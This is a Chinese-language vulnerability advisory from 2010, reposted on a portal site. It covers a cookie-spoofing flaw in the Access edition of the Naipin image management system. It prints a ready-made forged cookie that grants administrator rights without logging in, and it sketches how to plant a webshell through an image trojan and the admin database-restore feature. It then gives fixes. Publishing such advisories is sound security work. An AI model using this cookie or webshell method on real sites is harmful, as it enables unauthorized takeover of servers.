您好,欢迎访问一九零五行业门户网

耐品图片管理系统Access版Cookie欺骗漏洞

发布日期:2010-10.08 发布作者:redice 影响版本:20100906 access版 官方地址:http://www.naipin.com/ 漏洞 类型:cookie 欺骗 漏洞 描述:大概一年前我发现了《耐品 图片 管理 系统 access版》有cookie 欺骗 漏洞 :任意用户可以通过修改cookie拿到 管理
发布日期:2010-10.08
发布作者:redice
影响版本:20100906 access版
官方地址:http://www.naipin.com/
漏洞类型:cookie欺骗
漏洞描述:大概一年前我发现了《耐品图片管理系统access版》有cookie欺骗漏洞:任意用户可以通过修改cookie拿到管理员权限。
今年6月份我给耐品技术发了邮件,告知了这个漏洞,他们回复如下:
”您好,谢谢您的提醒!
祝您合家幸福安康!“
今天我下载了最新版(naipin_t_20100906_acc.rar)进行了测试,发现这个漏洞仍然存在。
既然官方如此不重视,我就它放出来。
netpic=articleflag=0&username=redice&groupid=1&comment=1&source=0&article=1&picflag=0&group=%c6%d5%cd%a8%bb%e1%d4%b1&vote=1&userid=77&self=1&view=1&manage=0&upload=1&viewhide=0&setting=1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1; aspsessionidcabrbatd=mdchgddaljgalhfhoiflfjll
利用上面的cookie不登录也能拿到管理员权限...
拿webshell的一种思路:
如果数据库后缀名是asp的,可以采用该思路。上传用户图像,上传一张含有一句话木马的图片(采用edjpgcom工具)。
进入后台,使用数据库恢复功能将上传的图片恢复为数据库。
修复方案:临时修补办法如下:
(1)admin_chklogin.asp第66行下增加如下代码:
session(groupid)=rs(groupid)
(2)将clsmain.asp的第112行改为如下代码:
usergroupid=session(groupid)
(3)建议尽量做到:能写入的目录不给执行权限,能执行的目录不给写入权限。
标签分类: cookie欺骗 验证漏洞
其它类似信息

推荐信息